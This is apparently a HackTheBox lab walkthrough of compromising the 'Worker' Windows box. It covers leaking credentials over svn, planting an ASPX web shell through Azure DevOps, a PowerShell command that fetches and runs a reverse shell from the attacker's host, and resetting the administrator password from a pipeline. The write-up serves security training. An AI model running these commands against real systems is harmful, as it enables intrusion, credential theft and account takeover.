Worker HackTheBox WalkThrough
This is Worker HackTheBox Walkthrough. In this writeup, I have demonstrated step-by-step how I rooted to Worker HTB box. Before starting let us know something about this box. It is a windows box with IP address 10.10.10.203 and difficulty medium assigned by it’s maker.
Before starting, first connect your PC with VPN and make sure your connectivity by pinging the IP 10.10.10.203. If all goes correct then it is time to start hacking.
As usual, I started by scanning the box. Scanning give us an idea how we have to proceed further. Like, it helps in banner grabbing the services running over different ports and sometimes it helps in vulnerability scanning also. Nmap (port scanner) gave the following result:-
Scanning
$ nmap -sC -sV -T4 -oN worker_scan 10.10.10.203
Nmap discovered that port 80 and 3690 are open. Microsoft IIS web server is running over port 80 and svnserve service is running over port 3690. Ongoing to URL http://10.10.10.203/ found default web page of Microsoft IIS server. Tried to explore the source-page if, this website has any hyperlink of other pages. However, got nothing interesting except Microsoft official page link. So left it there and tried to move forward to enumerate on port 3690.
Didn’t know anything about svnserve service but after some googling found this interesting article. It explains about a tool svn that is used to remotely access svn server. After playing for sometimes with this tool got a subdomain dimension.worker.htb and a file deploy.ps1.
$ svn list --verbose -r 2 svn://10.10.10.203/
After some, more enumeration got a way to dump the content of the file deploy.ps1.
$ svn diff -r 2 svn://10.10.10.203/
Got some credential nathen : wendel98 and a new subdomain devops.worker.htb. Did not know whose credential is it but as usual added it to my notes. It may be helpful further. Now we have two subdomains dimension.worker.htb and devops.worker.htb. Added both these subdomains to my hosts file.
Modified Hosts File
$ cat /etc/hosts
Ongoing to http://dimension.worker.htb/#work got some more subdomains, which is alpha.worker.htb, cartoon.worker.htb, solid-state.worker.htb, spectral.worker.htb, story.worker.htb and lens.worker.htb. Added them all to my hosts file. So my final hosts file looks something like below.
Modified Hosts File
$cat /etc/hosts
Ongoing to subdomains alpha.worker.htb, cartoon.worker.htb, solid-state.worker.htb, spectral.worker.htb, story.worker.htb and lens.worker.htb got nothing interesting on all these pages. So left them there and ongoing to http://devops.worker.htb got a login page like, we have in tomcat web server. Tried to login with the credential nathen:wendel98 and successfully logged in.
Upon login, find that it is Microsoft Azure DevOps platform. For more information about Microsoft Azure, you can watch this video. This is a Cloud based Service which gives us facility to create and deploy our custom package by directly uploading them on the server.
We will take advantage of it’s this feature of uploading and deploying any package. We will upload our command shell and deploy them in a branch created by us.
Therefore, to get a shell on my PC I followed the given steps.
1. Created a Branch named MyBranch1 in Repos.
2. Uploaded cmdasp.aspx command shell in spectral folder inside the branch MyBranch1
The command shell can be found at directory /usr/share/webshells/aspx/ in Kali Linux.
3. Then performed Commit, Pull and finally Approved it respectively.
Once our package is approved, it can be accessed at http://spectral.worker.htb/aspcmd.aspx .
Since we will upload our command shell in spectral directory that is why it will be accessed at subdomain spectral.worker.htb. Had we used some other folder like lens to upload our shell then it would be accessed at the subdomain lens.worker.htb.
I exactly did the same steps as described above.
Uploading & Deploying Package
1. Login to the DevOps using the credential nathen : wendel98
2. Click on SmartHotel360.
3. On the left pan of the window click on Braches option under repos menu and click on the New Branch to create a new branch.
4. Providing the Name as MyBranch1 and then Create branch.
5. Once branch is created click it to open all the files inside the branch.
6. Upload the cmdasp.aspx command shell by choosing Upload files and click on commit button to commit the upload.
7. Once we have commited successfully click Create a pull request to pull the commit.
8. Enter the name of the Title to Anything and choose the Reviewers to Nathalie Henley. In addition, choose Work Items to any from the two, which you want and click on Create.
9. Click on Approve, Complete and then Complete Merge. Before clicking on Complete Merge make sure to uncheck the 2nd option Delete MyBranch1 after merging.
After Complete Merge you will get the following message.
Now all set. Just go to the URL http://spectral.worker.htb/cmdasp.aspx to access the command shell and confirm the host by executing whoami && ipconfig.
Now we have remote command execution. It is time to get a reverse shell on our Terminal. There are multiple ways to get shell. I have used Invoke-PowerShellTcp.ps1 from here.
Getting Shell through RCE
To get a shell I did the following things
1. Downloaded the shell from above URL
2. Changed the IP address and port number inside Invoke-PowerShellTcp.ps1 file to my tun0 IP
3. Started netcat listener locally
4. Started Python HTTP web server locally
5. And executed the following command in the command shell at http://spectral.worker.htb/cmdasp.aspx
$ powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.12/Invoke-PowerShellTcp.ps1')"
Note: Try to refresh the page http://spectral.worker.htb/cmdasp.aspx for 4 to 5 times if you don’t get a command shell because it may takes some times to be deployed.
We got a shell. After some initial enumeration found a drive W on worker machine and inside the directory W:\svnrepos\www\conf\ a file named passwd. It contains all the svn user credential. And also the credential of the user robisl which is present in the C:\Users\ directory. The credential is robisl:wolves11
Tried to login remotely with the credential robisl:wolves11 using evil-winrm (A windows remote Management tool). And, successfully logged in.
Login using Evil-Winrm
$ evil-winrm -i 10.10.10.203 -u robisl -p wolves11
Capture User Flag
$ type ..\Desktop\user.txt
Privilege Escalation
To escalate privilege I did the following things
1. Logged in to devops.worker.htb using the creads robisl : wolves11
2. Created a pipeline
3. Then choosed “Azure Repos Git” for importing code
4. Clicked Repository PrtsUnlimited, then chose starter pipeline as platform
5. Finally introduced custom command inside the script to change admin password and at last save & run the script to execute command.
Following above steps
Creating Pipeline & Running Script
1. Click on PartsUnlimited
2. On, the left pane click on the option Pipelines.
3. Then New pipeline
4. Choose Azure Repos Git
5. Click on PartsUnlimited
6. Select the platform to Starter pipeline
7. Edit the code by adding net user administrator ThisIsNewPASSWD@123. Click save and run. The cmd command which we have introduced into our azure-pipelines.yml file will change the administrator password to ThisIsNewPASSWD@123.
8. Type the name to MyPipeline in review dialog box. Then save and run.
After successful run, you will have the following window.
Our administrator password is changed. We can now login remotely to the worker machine using evil-winrm with the credential administrator: ThisIsNewPASSWD@123
$ evil-winrm -i 10.10.10.203 -u administrator -p ThisIsNewPASSWD@123
Capture Root Flag
$ type ..\Desktop\root.txt
This is how I rooted to Worker HackTheBox. Learnt a lot after hunting this box. Hope you guys have also learnt some new things from this box. Thanks for reading this writeup. For any suggestion and query related to walkthrough, feel free to contact us at [email protected].
For more hackthebox walkthrough always visit ethicalhacs.com.
